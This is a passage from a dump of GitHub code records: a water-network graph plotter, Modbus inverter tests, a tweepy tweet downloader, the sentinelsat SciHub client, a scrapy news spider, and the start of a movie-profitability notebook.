plt.figure(facecolor='w', edgecolor='k')\n    \n    # Graph \n    G = wn.get_graph_deep_copy()\n    if not directed:\n        G = G.to_undirected()\n    \n    # Position\n    pos = nx.get_node_attributes(G,'pos')\n    if len(pos) == 0:\n        pos = None\n    \n    # Node attribute\n    if isinstance(node_attribute, str):\n        node_attribute = wn.query_node_attribute(node_attribute)\n    if isinstance(node_attribute, list):\n        node_attribute = dict(zip(node_attribute,[1]*len(node_attribute)))\n    if isinstance(node_attribute, pd.Series):\n        if node_attribute.index.nlevels == 2: # (nodeid, time) index\n            node_attribute.reset_index(level=1, drop=True, inplace=True) # drop time\n        node_attribute = dict(node_attribute)\n    \n    # Define node list, color, and colormap\n    if node_attribute is None: \n        nodelist = None\n        nodecolor = 'k'\n    else:\n        nodelist,nodecolor = zip(*node_attribute.items())\n    if node_cmap is None:\n        node_cmap=plt.cm.jet\n        \n    # Link attribute\n    if isinstance(link_attribute, str):\n        link_attribute = wn.query_link_attribute(link_attribute)\n    if isinstance(link_attribute, list):\n        link_attribute = dict(zip(link_attribute,[1]*len(link_attribute)))\n    if isinstance(link_attribute, pd.Series):\n        if link_attribute.index.nlevels == 2: # (linkid, time) index\n            link_attribute.reset_index(level=1, drop=True, inplace=True) # drop time\n        link_attribute = dict(link_attribute)\n    \n    # Replace link_attribute dictionary defined as\n    # {link_name: attr} with {(start_node, end_node, link_name): attr}\n    if link_attribute is not None: \n        attr = {}\n        for link_name, value in link_attribute.items(): # items() instead of the Python 2 only iteritems()\n            link = wn.get_link(link_name)\n            attr[(link.start_node(), link.end_node(), link_name)] = value\n        link_attribute = attr\n    if type(link_width) is dict:\n        attr = {}\n        for link_name, value in link_width.items(): # items() instead of the Python 2 only iteritems()\n            link = wn.get_link(link_name)\n            attr[(link.start_node(), link.end_node(), link_name)] = value\n        link_width = attr\n    \n    # Define link list, color, and colormap\n    if link_attribute is None: \n        linklist = None\n        linkcolor = 'k'\n    else:\n        linklist,linkcolor = zip(*link_attribute.items())\n    if type(link_width) is dict:\n        linklist2,link_width = zip(*link_width.items())\n        if not linklist == linklist2:\n            logger.warning('Link color and width do not share the same indexes, link width changed to 1.')\n            link_width = 1\n    if link_cmap is None:\n        link_cmap=plt.cm.jet\n    \n    # Plot\n    #plt.figure(facecolor='w', edgecolor='k', figsize=figsize, dpi=dpi)\n    \n    if title is not None:\n        plt.title(title)\n\n    if node_labels:\n        nodes = nx.draw_networkx_labels(G, pos,\n            nodelist=nodelist, node_color=nodecolor, node_size=node_size, cmap=node_cmap, vmin = node_range[0], vmax = node_range[1],linewidths=0)\n    else:\n        
nodes = nx.draw_networkx_nodes(G, pos, with_labels=False, \n nodelist=nodelist, node_color=nodecolor, node_size=node_size, cmap=node_cmap, vmin = node_range[0], vmax = node_range[1],linewidths=0)\n edges = nx.draw_networkx_edges(G, pos, \n edgelist=linklist, edge_color=linkcolor, width=link_width, edge_cmap=link_cmap, edge_vmin = link_range[0], edge_vmax = link_range[1])\n if add_colorbar and node_attribute:\n plt.colorbar(nodes, shrink=0.5, pad = 0)\n if add_colorbar and link_attribute:\n plt.colorbar(edges, shrink=0.5, pad = 0.05)\n plt.axis('off')\n \n return nodes, edges\n\ndef custom_colormap(numcolors=11, colors=['blue','white','red']):\n \"\"\" \n Create a custom colormap\n Default is blue to white to red with 11 colors. \n Colors can be specified in any way understandable by matplotlib.colors.ColorConverter.to_rgb()\n \"\"\"\n cmap = LinearSegmentedColormap.from_list(name='custom', \n colors = colors,\n N=numcolors)\n return cmap\n \n","repo_name":"stephenfrechette/WNTR-test","sub_path":"wntr/network/draw_graph.py","file_name":"draw_graph.py","file_ext":"py","file_size_in_byte":7295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"11775465687","text":"import unittest\nfrom unittest.mock import patch\n\nfrom deye_config import DeyeConfig, DeyeLoggerConfig\nfrom deye_modbus import DeyeModbus\nfrom deye_modbus_tcp import DeyeModbusTcp\n\n\nclass DeyeModbusTest(unittest.TestCase):\n def setUp(self):\n self.config = DeyeConfig(logger_config=DeyeLoggerConfig(1234567890, \"192.168.1.1\", 8899), mqtt=None)\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_read_register_0x01(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a5000000000000000000000000000000000000000000000000010301000ac84300000015\"\n )\n\n # when\n reg_values = sut.read_registers(1, 1)\n\n # then\n self.assertEqual(len(reg_values), 1)\n self.assertTrue(1 in reg_values)\n self.assertEqual(reg_values[1].hex(), \"000a\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_read_registers_0x02_0x03(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a5000000000000000000000000000000000000000000000000010302000a000b13f600000015\"\n )\n\n # when\n reg_values = sut.read_registers(2, 3)\n\n # then\n self.assertEqual(len(reg_values), 2)\n self.assertTrue(2 in reg_values)\n self.assertTrue(3 in reg_values)\n self.assertEqual(reg_values[2].hex(), \"000a\")\n self.assertEqual(reg_values[3].hex(), \"000b\")\n\n # and\n connector.send_request.assert_called_once_with(\n bytearray.fromhex(\"a5170010450000d202964902000000000000000000000000000001030002000265cb5915\")\n )\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_write_register_0x12_to_0xa3d4(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a5000000000000000000000000000000000000000000000000\" + \"011000120001a1cc\" + \"0015\"\n )\n\n # when\n success = sut.write_register(0x12, 0xA3D4)\n\n # then\n self.assertTrue(success)\n connector.send_request.assert_called_once_with(\n bytearray.fromhex(\"a51a0010450000d202964902000000000000000000000000000001100012000102a3d4dd8d2b15\")\n )\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_read_register_SUN_10K_SG04LP3_EU_part1(self, connector):\n # given\n sut = 
DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a53b0010150007482ee38d020121d0060091010000403e486301032800ffffff160a12162420ffffffffffffffffffffffffffffffffffff0001ffff0001ffff000003e81fa45115\"\n )\n\n # when\n reg_values = sut.read_registers(0x3C, 0x4F)\n\n # then\n self.assertEqual(len(reg_values), 20)\n self.assertTrue(0x3C in reg_values)\n self.assertTrue(0x4F in reg_values)\n self.assertEqual(reg_values[0x3C].hex(), \"00ff\")\n self.assertEqual(reg_values[0x4F].hex(), \"03e8\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_read_register_SUN_10K_SG04LP3_EU_part2(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a5330010150008482ee38d020122d0060091010000403e486301032000010000ffffffffffff0001ffffffffffffffffffff0000ffff0011ffffffff3a005715\"\n )\n\n # when\n reg_values = sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(reg_values), 16)\n self.assertTrue(0x50 in reg_values)\n self.assertTrue(0x5F in reg_values)\n self.assertEqual(reg_values[0x50].hex(), \"0001\")\n self.assertEqual(reg_values[0x5F].hex(), \"ffff\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_incorrect_inverter_serial_number(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a51000101500c9c22576f80201032d0000790800007106d6630600bd15\"\n )\n\n # when\n with self.assertLogs() as captured:\n sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(captured.records), 1)\n self.assertEqual(\n captured.records[0].getMessage(), \"Logger Serial Number does not match. Check your configuration file.\"\n )\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_incorrect_modbus_address(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a51000101500c9c22576f80201032d0000790800007106d6630500bd15\"\n )\n\n # when\n with self.assertLogs() as captured:\n sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(captured.records), 1)\n self.assertEqual(captured.records[0].getMessage(), \"Modbus device address does not match.\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_unknown_error_code(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"a51000101500c9c22576f80201032d0000790800007106d6630100bd15\"\n )\n\n # when\n with self.assertLogs() as captured:\n sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(captured.records), 1)\n self.assertEqual(captured.records[0].getMessage(), \"Unknown response error code. Error frame: 0100\")\n\n @patch(\"deye_connector.DeyeConnector\")\n def test_at_protocol_detected(self, connector):\n # given\n sut = DeyeModbus(DeyeModbusTcp(self.config, connector))\n connector.send_request.return_value = bytearray.fromhex(\n \"41542b595a434d505645523d4d57335f3136555f353430365f322e33322d44310d0a0d0a\"\n )\n\n # when\n with self.assertLogs() as captured:\n sut.read_registers(0x50, 0x5F)\n\n # then\n self.assertEqual(len(captured.records), 1)\n self.assertEqual(\n captured.records[0].getMessage(),\n \"AT response detected. Try switching to 'AT' protocol. 
Set 'DEYE_LOGGER_PROTOCOL=at' and remove DEYE_LOGGER_PORT from your config\",\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"kbialek/deye-inverter-mqtt","sub_path":"tests/deye_modbus_test.py","file_name":"deye_modbus_test.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"6"} +{"seq_id":"7790306120","text":"import tweepy\nfrom tweepy import OAuthHandler\n\nconsumer_key = 'YOUR-CONSUMER-KEY'\nconsumer_secret = 'YOUR-CONSUMER-SECRET'\naccess_token = 'YOUR-ACCESS-TOKEN'\naccess_secret = 'YOUR-ACCESS-SECRET'\n \nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n \napi = tweepy.API(auth)\n\n#public_tweets = api.user_timeline('realdonaldtrump', tweet_mode='extended')\n#print(public_tweets[5].text)\n\nmyfile = open('tweets.txt', \"w\")\n\n# for tweet in public_tweets:\n# myfile.write(tweet.full_text+\"\\n\")\n\nfor status in tweepy.Cursor(api.user_timeline, id=\"realDonaldTrump\", tweet_mode='extended', until='2017-03-29').items():\n myfile.write(status.full_text+\"\\n\")\n\nmyfile.close()\n\n# Get the User object for twitter...\nuser = api.get_user('sharmaraghav260')\n\n# print (user.screen_name)\n# print (user.followers_count)\n# for friend in user.friends():\n# print (friend.screen_name)","repo_name":"sharmaraghav260/Analyzing-POTUS","sub_path":"tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9630306476","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport hashlib\nimport logging\nimport re\nimport xml.etree.ElementTree as ET\nfrom collections import OrderedDict\nfrom datetime import date, datetime, timedelta\nfrom os import remove\nfrom os.path import exists, getsize, join\nfrom time import sleep\n\nimport geojson\nimport homura\nimport html2text\nimport pycurl\nimport requests\nfrom tqdm import tqdm\n\nfrom six import string_types\nfrom six.moves.urllib.parse import urljoin\n\nfrom . 
import __version__ as sentinelsat_version\n\ntry:\n import certifi\nexcept ImportError:\n certifi = None\n\n\nclass SentinelAPI(object):\n \"\"\"Class to connect to Sentinel Data Hub, search and download imagery.\n\n Parameters\n ----------\n user : string\n username for DataHub\n password : string\n password for DataHub\n api_url : string, optional\n URL of the DataHub\n defaults to 'https://scihub.copernicus.eu/apihub'\n\n Attributes\n ----------\n session : requests.Session object\n Session to connect to DataHub\n api_url : str\n URL to the DataHub\n page_size : int\n number of results per query page\n current value: 100 (maximum allowed on ApiHub)\n \"\"\"\n\n logger = logging.getLogger('sentinelsat.SentinelAPI')\n\n def __init__(self, user, password, api_url='https://scihub.copernicus.eu/apihub/'):\n self.session = requests.Session()\n self.session.auth = (user, password)\n self.api_url = api_url if api_url.endswith('/') else api_url + '/'\n self.page_size = 100\n self.user_agent = 'sentinelsat/' + sentinelsat_version\n self.session.headers['User-Agent'] = self.user_agent\n # For unit tests\n self._last_query = None\n self._last_status_code = None\n\n def query(self, area, initial_date=None, end_date=datetime.now(), **keywords):\n \"\"\"Query the SciHub API with the coordinates of an area, a date interval\n and any other search keywords accepted by the SciHub API.\n \"\"\"\n query = self.format_query(area, initial_date, end_date, **keywords)\n return self.load_query(query)\n\n @staticmethod\n def format_query(area, initial_date=None, end_date=datetime.now(), **keywords):\n \"\"\"Create the SciHub API query string\n \"\"\"\n if initial_date is None:\n initial_date = end_date - timedelta(hours=24)\n\n acquisition_date = '(beginPosition:[%s TO %s])' % (\n _format_date(initial_date),\n _format_date(end_date)\n )\n query_area = ' AND (footprint:\"Intersects(POLYGON((%s)))\")' % area\n\n filters = ''\n for kw in sorted(keywords.keys()):\n filters += ' AND (%s:%s)' % (kw, keywords[kw])\n\n query = ''.join([acquisition_date, query_area, filters])\n return query\n\n def load_query(self, query, start_row=0):\n \"\"\"Do a full-text query on the SciHub API using the OpenSearch format specified in\n https://scihub.copernicus.eu/twiki/do/view/SciHubUserGuide/3FullTextSearch\n \"\"\"\n # store last query (for testing)\n self._last_query = query\n\n # load query results\n url = self._format_url(start_row=start_row)\n response = self.session.post(url, dict(q=query), auth=self.session.auth)\n _check_scihub_response(response)\n\n # store last status code (for testing)\n self._last_status_code = response.status_code\n\n # parse response content\n try:\n json_feed = response.json()['feed']\n total_results = int(json_feed['opensearch:totalResults'])\n except (ValueError, KeyError):\n raise SentinelAPIError(http_status=response.status_code,\n msg='API response not valid. 
JSON decoding failed.',\n response_body=response.content)\n\n entries = json_feed.get('entry', [])\n # this verification is necessary because if the query returns only\n # one product, self.products will be a dict not a list\n if isinstance(entries, dict):\n entries = [entries]\n\n output = entries\n # repeat query until all results have been loaded\n if total_results > start_row + self.page_size - 1:\n output += self.load_query(query, start_row=(start_row + self.page_size))\n return output\n\n @staticmethod\n def to_geojson(products):\n \"\"\"Return the products from a query response as a GeoJSON with the values in their appropriate Python types.\n \"\"\"\n feature_list = []\n products_dict = SentinelAPI.to_dict(products, parse_values=False)\n for i, (title, props) in enumerate(products_dict.items()):\n props['title'] = title\n poly = _geojson_poly_from_wkt(props['footprint'])\n del props['footprint']\n del props['gmlfootprint']\n feature_list.append(\n geojson.Feature(geometry=poly, id=i, properties=props)\n )\n return geojson.FeatureCollection(feature_list)\n\n @staticmethod\n def to_dict(products, parse_values=True):\n \"\"\"Return the products from a query response as a dictionary with the values in their appropriate Python types.\n \"\"\"\n\n def convert_date(content):\n try:\n value = datetime.strptime(content, '%Y-%m-%dT%H:%M:%SZ')\n except ValueError:\n value = datetime.strptime(content, '%Y-%m-%dT%H:%M:%S.%fZ')\n return value\n\n if parse_values:\n converters = {'date': convert_date, 'int': int, 'float': float, 'double': float}\n else:\n converters = {}\n # Keep the string type by default\n default_converter = lambda x: x\n\n output = OrderedDict()\n for prod in products:\n product_dict = {}\n prodname = prod['title']\n output[prodname] = product_dict\n for key in prod:\n if key == 'title':\n continue\n if isinstance(prod[key], string_types):\n product_dict[key] = prod[key]\n else:\n properties = prod[key]\n if isinstance(properties, dict):\n properties = [properties]\n if key == 'link':\n for p in properties:\n name = 'link'\n if 'rel' in p:\n name = 'link_' + p['rel']\n product_dict[name] = p['href']\n else:\n f = converters.get(key, default_converter)\n for p in properties:\n product_dict[p['name']] = f(p['content'])\n\n return output\n\n @staticmethod\n def to_dataframe(products):\n \"\"\"Return the products from a query response as a Pandas DataFrame with the values in their appropriate Python types.\n \"\"\"\n import pandas as pd\n\n products_dict = SentinelAPI.to_dict(products)\n return pd.DataFrame.from_dict(products_dict, orient='index')\n\n @staticmethod\n def to_geodataframe(products):\n \"\"\"Return the products from a query response as a GeoPandas GeoDataFrame with the values in their appropriate Python types.\n \"\"\"\n import geopandas as gpd\n import shapely.wkt\n\n df = SentinelAPI.to_dataframe(products)\n crs = {'init': 'epsg:4326'} # WGS84\n geometry = [shapely.wkt.loads(fp) for fp in df['footprint']]\n # remove useless columns\n df.drop(['footprint', 'gmlfootprint'], axis=1, inplace=True)\n return gpd.GeoDataFrame(df, crs=crs, geometry=geometry)\n\n def get_product_odata(self, id):\n \"\"\"Access SciHub OData API to get info about a Product. Returns a dict\n containing the id, title, size, md5sum, date, footprint and download url\n of the Product. 
The date field receives the Start ContentDate of the API.\n \"\"\"\n\n response = self.session.get(\n urljoin(self.api_url, \"odata/v1/Products('%s')/?$format=json\" % id)\n )\n _check_scihub_response(response)\n\n d = response.json()['d']\n\n # parse the GML footprint to same format as returned\n # by .get_coordinates()\n geometry_xml = ET.fromstring(d[\"ContentGeometry\"])\n poly_coords_str = geometry_xml \\\n .find('{http://www.opengis.net/gml}outerBoundaryIs') \\\n .find('{http://www.opengis.net/gml}LinearRing') \\\n .findtext('{http://www.opengis.net/gml}coordinates')\n poly_coords = (coord.split(\",\")[::-1] for coord in poly_coords_str.split(\" \"))\n coord_string = \",\".join(\" \".join(coord) for coord in poly_coords)\n\n values = {\n 'id': d['Id'],\n 'title': d['Name'],\n 'size': int(d['ContentLength']),\n 'md5': d['Checksum']['Value'],\n 'date': _convert_timestamp(d['ContentDate']['Start']),\n 'footprint': coord_string,\n 'url': urljoin(self.api_url, \"odata/v1/Products('%s')/$value\" % id)\n }\n return values\n\n def download(self, id, directory_path='.', checksum=False, check_existing=False, **kwargs):\n \"\"\"Download a product using homura.\n\n Uses the filename on the server for the downloaded file, e.g.\n \"S1A_EW_GRDH_1SDH_20141003T003840_20141003T003920_002658_002F54_4DD1.zip\".\n\n Incomplete downloads are continued and complete files are skipped.\n\n Further keyword arguments are passed to the homura.download() function.\n\n Parameters\n ----------\n id : string\n UUID of the product, e.g. 'a8dd0cfd-613e-45ce-868c-d79177b916ed'\n directory_path : string, optional\n Where the file will be downloaded\n checksum : bool, optional\n If True, verify the downloaded file's integrity by checking its MD5 checksum.\n Throws InvalidChecksumError if the checksum does not match.\n Defaults to False.\n check_existing : bool, optional\n If True and a fully downloaded file with the same name exists on the disk,\n verify its integrity using its MD5 checksum. Re-download in case of non-matching checksums.\n Defaults to False.\n\n Returns\n -------\n path : string\n Disk path of the downloaded file,\n product_info : dict\n Dictionary containing the product's info from get_product_info().\n\n Raises\n ------\n InvalidChecksumError\n If the MD5 checksum does not match the checksum on the server.\n \"\"\"\n # Check if API is reachable.\n product_info = None\n while product_info is None:\n try:\n product_info = self.get_product_odata(id)\n except SentinelAPIError as e:\n self.logger.info(\"Invalid API response:\\n{}\\nTrying again in 1 minute.\".format(str(e)))\n sleep(60)\n\n path = join(directory_path, product_info['title'] + '.zip')\n kwargs = _fillin_cainfo(kwargs)\n\n self.logger.info('Downloading %s to %s' % (id, path))\n\n # Check if the file exists and passes md5 test\n # Homura will by default continue the download if the file exists but is incomplete\n if exists(path) and getsize(path) == product_info['size']:\n if not check_existing or _md5_compare(path, product_info['md5']):\n self.logger.info('%s was already downloaded.' % path)\n return path, product_info\n else:\n self.logger.info(\n '%s was already downloaded but is corrupt: checksums do not match. Re-downloading.' 
% path)\n remove(path)\n\n if (exists(path) and getsize(path) >= 2 ** 31 and\n pycurl.version.split()[0].lower() <= 'pycurl/7.43.0'):\n # Workaround for PycURL's bug when continuing > 2 GB files\n # https://github.com/pycurl/pycurl/issues/405\n remove(path)\n\n homura.download(product_info['url'], path=path, auth=self.session.auth,\n user_agent=self.user_agent, **kwargs)\n\n # Check integrity with MD5 checksum\n if checksum is True:\n if not _md5_compare(path, product_info['md5']):\n raise InvalidChecksumError('File corrupt: checksums do not match')\n return path, product_info\n\n def download_all(self, products, directory_path='.', max_attempts=10, checksum=False, check_existing=False,\n **kwargs):\n \"\"\"Download all products returned in query().\n\n File names on the server are used for the downloaded files, e.g.\n \"S1A_EW_GRDH_1SDH_20141003T003840_20141003T003920_002658_002F54_4DD1.zip\".\n\n In case of interruptions or other exceptions, downloading will restart from where it left off.\n Downloading is attempted at most max_attempts times to avoid getting stuck with unrecoverable errors.\n\n Parameters\n ----------\n products : list\n List of products returned with self.query()\n directory_path : string\n Directory where the downloaded files will be downloaded\n max_attempts : int, optional\n Number of allowed retries before giving up downloading a product. Defaults to 10.\n\n Other Parameters\n ----------------\n See download().\n\n Returns\n -------\n dict[string, dict|None]\n A dictionary with an entry for each product mapping the downloaded file path to its product info\n (returned by get_product_info()). Product info is set to None if downloading the product failed.\n \"\"\"\n result = {}\n self.logger.info(\"Will download %d products\" % len(products))\n for i, product in enumerate(products):\n path = join(directory_path, product['title'] + '.zip')\n product_info = None\n download_successful = False\n remaining_attempts = max_attempts\n while not download_successful and remaining_attempts > 0:\n try:\n path, product_info = self.download(product['id'], directory_path, checksum, check_existing,\n **kwargs)\n download_successful = True\n except (KeyboardInterrupt, SystemExit):\n raise\n except InvalidChecksumError:\n self.logger.warning(\"Invalid checksum. The downloaded file '{}' is corrupted.\".format(path))\n except:\n self.logger.exception(\"There was an error downloading %s\" % product['title'])\n remaining_attempts -= 1\n result[path] = product_info\n self.logger.info(\"{}/{} products downloaded\".format(i + 1, len(products)))\n return result\n\n @staticmethod\n def get_products_size(products):\n \"\"\"Return the total filesize in GB of all products in the query\"\"\"\n size_total = 0\n for product in products:\n size_product = next(x for x in product[\"str\"] if x[\"name\"] == \"size\")[\"content\"]\n size_value = float(size_product.split(\" \")[0])\n size_unit = str(size_product.split(\" \")[1])\n if size_unit == \"MB\":\n size_value /= 1024.\n if size_unit == \"KB\":\n size_value /= 1024. 
* 1024.\n size_total += size_value\n return round(size_total, 2)\n\n def _format_url(self, start_row=0):\n blank = 'search?format=json&rows={rows}&start={start}'.format(\n rows=self.page_size, start=start_row\n )\n return urljoin(self.api_url, blank)\n\n\nclass SentinelAPIError(Exception):\n \"\"\"Invalid responses from SciHub.\n \"\"\"\n\n def __init__(self, http_status=None, code=None, msg=None, response_body=None):\n self.http_status = http_status\n self.code = code\n self.msg = msg\n self.response_body = response_body\n\n def __str__(self):\n return '(HTTP status: {0}, code: {1}) {2}'.format(\n self.http_status, self.code,\n ('\\n' if '\\n' in self.msg else '') + self.msg)\n\n\nclass InvalidChecksumError(Exception):\n \"\"\"MD5 checksum of local file does not match the one from the server.\n \"\"\"\n pass\n\n\ndef get_coordinates(geojson_file, feature_number=0):\n \"\"\"Return the coordinates of a polygon of a GeoJSON file.\n\n Parameters\n ----------\n geojson_file : str\n location of GeoJSON file_path\n feature_number : int\n Feature to extract polygon from (in case of MultiPolygon\n FeatureCollection), defaults to first Feature\n\n Returns\n -------\n polygon coordinates\n string of comma separated coordinate tuples (lon, lat) to be used by SentinelAPI\n \"\"\"\n geojson_obj = geojson.loads(open(geojson_file, 'r').read())\n coordinates = geojson_obj['features'][feature_number]['geometry']['coordinates'][0]\n # precision of 7 decimals equals 1mm at the equator\n coordinates = ['%.7f %.7f' % (coord[0], coord[1]) for coord in coordinates]\n return ','.join(coordinates)\n\n\ndef _fillin_cainfo(kwargs_dict):\n \"\"\"Fill in the path of the PEM file containing the CA certificate.\n\n The priority is: 1. user provided path, 2. path to the cacert.pem\n bundle provided by certifi (if installed), 3. let pycurl use the\n system path where libcurl's cacert bundle is assumed to be stored,\n as established at libcurl build time.\n \"\"\"\n try:\n cainfo = kwargs_dict['pass_through_opts'][pycurl.CAINFO]\n except KeyError:\n try:\n cainfo = certifi.where()\n except AttributeError:\n cainfo = None\n\n if cainfo is not None:\n pass_through_opts = kwargs_dict.get('pass_through_opts', {})\n pass_through_opts[pycurl.CAINFO] = cainfo\n kwargs_dict['pass_through_opts'] = pass_through_opts\n\n return kwargs_dict\n\n\ndef _format_date(in_date):\n \"\"\"Format date or datetime input or a YYYYMMDD string input to\n YYYY-MM-DDThh:mm:ssZ string format. In case you pass an\n \"\"\"\n\n if type(in_date) == datetime or type(in_date) == date:\n return in_date.strftime('%Y-%m-%dT%H:%M:%SZ')\n else:\n try:\n return datetime.strptime(in_date, '%Y%m%d').strftime('%Y-%m-%dT%H:%M:%SZ')\n except ValueError:\n return in_date\n\n\ndef _convert_timestamp(in_date):\n \"\"\"Convert the timestamp received from OData JSON API, to\n YYYY-MM-DDThh:mm:ssZ string format.\n \"\"\"\n in_date = int(in_date.replace('/Date(', '').replace(')/', '')) / 1000.\n return _format_date(datetime.utcfromtimestamp(in_date))\n\n\ndef _check_scihub_response(response):\n \"\"\"Check that the response from server has status code 2xx and that the response is valid JSON.\"\"\"\n try:\n response.raise_for_status()\n response.json()\n except (requests.HTTPError, ValueError) as e:\n msg = \"API response not valid. 
JSON decoding failed.\"\n code = None\n try:\n msg = response.json()['error']['message']['value']\n code = response.json()['error']['code']\n except:\n if not response.text.rstrip().startswith('{'):\n try:\n h = html2text.HTML2Text()\n h.ignore_images = True\n h.ignore_anchors = True\n msg = h.handle(response.text).strip()\n except:\n pass\n api_error = SentinelAPIError(response.status_code, code, msg, response.content)\n # Suppress \"During handling of the above exception...\" message\n # See PEP 409\n api_error.__cause__ = None\n raise api_error\n\n\ndef _geojson_poly_from_wkt(wkt):\n \"\"\"Return a geojson Polygon object from a WKT string\"\"\"\n coordlist = re.search(r'\\(\\s*([^()]+)\\s*\\)', wkt).group(1)\n coord_list_split = (coord.split(' ') for coord in coordlist.split(','))\n poly = geojson.Polygon([(float(coord[0]), float(coord[1])) for coord in coord_list_split])\n return poly\n\n\ndef _md5_compare(file_path, checksum, block_size=2 ** 13):\n \"\"\"Compare a given md5 checksum with one calculated from a file\"\"\"\n md5 = hashlib.md5()\n with open(file_path, \"rb\") as f:\n progress = tqdm(desc=\"MD5 checksumming\", total=getsize(file_path), unit=\"B\", unit_scale=True)\n while True:\n block_data = f.read(block_size)\n if not block_data:\n break\n md5.update(block_data)\n progress.update(len(block_data))\n progress.close()\n return md5.hexdigest().lower() == checksum.lower()\n","repo_name":"HKCaesar/sentinelsat","sub_path":"sentinelsat/sentinel.py","file_name":"sentinel.py","file_ext":"py","file_size_in_byte":20751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"41016214923","text":"import scrapy\nimport requests\nimport json\nimport time \n\nclass VcbeatSpider(scrapy.Spider):\n name = \"vcbeat\"\n\n def start_requests(self):\n article_list_url = 'http://www.vcbeat.net/Index/Index/ajaxGetArticleList'\n article_url = 'http://www.vcbeat.net'\n categoryId = '2999'\n page = 1\n while True:\n res = requests.post(article_list_url, \n data = {'categoryId':categoryId, 'page':page})\n print('page: ', page)\n while res.status_code == 404:\n print('@@@@@ retry')\n time.sleep(3)\n res = requests.post(article_list_url, \n data = {'categoryId':categoryId, 'page':page})\n content = json.loads(res.content.decode('utf-8-sig'))\n if content['status'] != 1:\n break\n data = content['data']\n for item in data:\n yield scrapy.Request(url=f'''{article_url}/{item['id']}''', \n callback=self.parse(item['publish_time'], item['title']))\n page += 1\n\n\n\n def parse(self, date, title):\n def lam(response):\n content = response.xpath('//div[@class=\"row\"]/div[@id=\"article-detail\"]/div[@id=\"article-content\"]/p/span/text()').extract()\n content.extend(response.xpath('//div[@class=\"row\"]/div[@id=\"article-detail\"]/div[@id=\"article-content\"]/p/text()').extract())\n content.extend(response.xpath('//div[@class=\"row\"]/div[@id=\"article-detail\"]/div[@id=\"article-content\"]/sector/p/text()').extract())\n content.extend(response.xpath('//div[@class=\"row\"]/div[@id=\"article-detail\"]/div[@id=\"article-content\"]/section/p/text()').extract())\n cntx = ''.join(content)\n filename = f'{date}:{title}.txt'\n with open(f'vcbeat/{filename}', 'w') as f:\n f.write(cntx)\n self.log('Saved file %s' % filename)\n return lam","repo_name":"quheng/chalk","sub_path":"spider/spider/spiders/vcbeat.py","file_name":"vcbeat.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} 
+{"seq_id":"16858312149","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Sussex Budget Productions: Data Insights and Reccomendations for Future Investment 2021\n# \n\n# <b>Student Number: 244799<b>\n# \n# \n\n# This report investigates profitability of movie genres 2000-2016 to advise Sussex Budget Productions on recommendations for future film ventures.\n# Based on the company aims to gain 1.5million funding, the potential revenue of the analysis recommendations will be projected and thus can be used in consultations with investors.<br />\n# <br />\n# The beginning of the report will clean and explore of movie data to propose targeted analytical ideas.\n# <br />\n# Based on the insights derived from the overview, hypotheses on the genres likely to bring us the most profit are constructed and tested statistically.\n# <br /> \n# Following the analysis, recommendations will be stated in the summary. All analysis will be run in the Python programming language.\n\n# ### Data Import and Cleaning\n\n# In[12]:\n\n\n#Import programming packages\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport scipy.stats as stats\n\nMovieFile = 'movie_metadata.csv'\n\n#Read movie data into DataFrame\nRawData = pd.read_csv(MovieFile,index_col=None)\nprint(RawData.head(10))\n\n\n# Below shows basic attributes of the dataset; the number of movies included, the columns (measures) available which can be used as parameters in the analysis, and the years of movie creation.\n\n# In[3]:\n\n\n#Get number of movies\nShape=RawData.shape\nprint(\"The number of movies in the dataset is: \"+ str(Shape[0]))\n\n#Print columns\nprint(\"\\nThe following columns are available in the data set:\\n\")\nfor Col in RawData.columns:\n print(Col)\n \n#Print Year range\nYearMin=int(np.min(RawData.title_year))\nYearMax=int(np.max(RawData.title_year))\nprint(\"\\nThe data has been taken from the years: \"+str(YearMin)+\" and \"+str(YearMax))\n\n\n# There is plenty of information provided about the movies seen in the columns printed above, including the directors of the movie, facebook likes, countries and genres. There is also 